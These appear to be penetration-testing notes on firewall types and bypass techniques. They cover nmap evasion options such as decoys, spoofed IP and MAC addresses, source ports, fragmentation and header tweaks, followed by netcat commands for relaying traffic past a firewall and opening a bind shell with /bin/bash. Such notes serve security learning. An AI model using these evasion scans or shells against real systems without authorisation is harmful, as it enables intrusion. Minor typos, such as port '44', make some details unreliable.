# Firewall Handling and Bypassing ## Types * Packet filtering * Circuit level gateway * Stateful inspection * Proxy * Next generation firewall * Cloud firewall and FWaaS ## Rules * Firewalls follow rules sets configured like in the example below ### Windows ```sh netsh advfirewall firewall add rule name="muka" dir=in action=allow protocol=tcp localport=57869 ``` ### Linux ```sh firewall-cmd --zone=public --add-port=57869/tcp ``` ## Bypassing Firewalls * IP/MAC/Port spoofing * Fragmentation, MTU, data length * Header modification ### nmap * nmap contains multiple measures which can be used to circumvent firewalls securing the target we want to connect to. #### Spoofing * __Decoy__ `-D` , shuffle existing IP address with random adresses. Every port will be requested by any of these addresses. ```sh sudo nmap -Pn -D 192.168.0.23,192.168.0.42,ME -F $TARGET_IP sudo nmap -Pn -D RND,RND,ME -F $TARGET_IP ``` * __Proxy__ ```sh sudo nmap -Pn -F --proxies $PROXY_IP $TARGET_IP ``` * __Spoofed MAC__ ```sh sudo nmap -Pn -F --spoof-mac $MAC_ADDRESS $TARGET_IP ``` * __Spoofed IP__ ```sh sudo nmap -Pn -F -S $ATTACKER_IP $TARGET_IP ``` * __Port Number__, select a port which is whitelisted. Frequently this is 53,80,44 ```sh sudo nmap -F --source-port 443 $TARGET_IP ``` * __Fragmentation__, eth header + 20 bytes header size + bytes fragments via `-f`, or 16 bytes via `-ff` ```sh sudo nmap -Pn -F -f $TARGET_IP ``` * __MTU__, works like fragmentation, `-f` == `--mtu 8` ```sh sudo nmap -Pn -F --mtu 8 ``` * __DATA Length__, eth header + IP header + prepend padding segment size to values of bytes ```sh sudo nmap -Pn -F --data-length 64 $TARGET_IP ``` #### Header Fields * __TTL__ ```sh sudo nmap -Pn -F --ttl 64 $TARGET_IP ``` * __IP OPTIONS__, `--ip-options` recordsas hex String * Route, `R` * Timestamp, `T` * Route + Timestamp, `U` * Loose source routing, `L $IP $IP $IP` * Strict source routing, `S $IP $IP $IP` * __Checksum__, craft bad checksum via `--badsum` to check errors ```sh sudo nmap -Pn -F --badsum $TARGET_IP ``` #### Post FW After the firewall has been bypassed there are further possible steps to gain foothold. One of them is to open a bind shell on standard ports which are usually not covered by firewall configurations like 443 or 80. * __Hopping__, listen via netcat to catch that port * __Tunneling__, relay open after passsing the firewall to connect to the closed port ```sh nc -lvnp 443 --sh-exec "nc $TARGET_IP 25" ``` * __Non standard ports__, open bin shell via ```sh nc -lvnp 8888 -e /bin/bash ``` and connect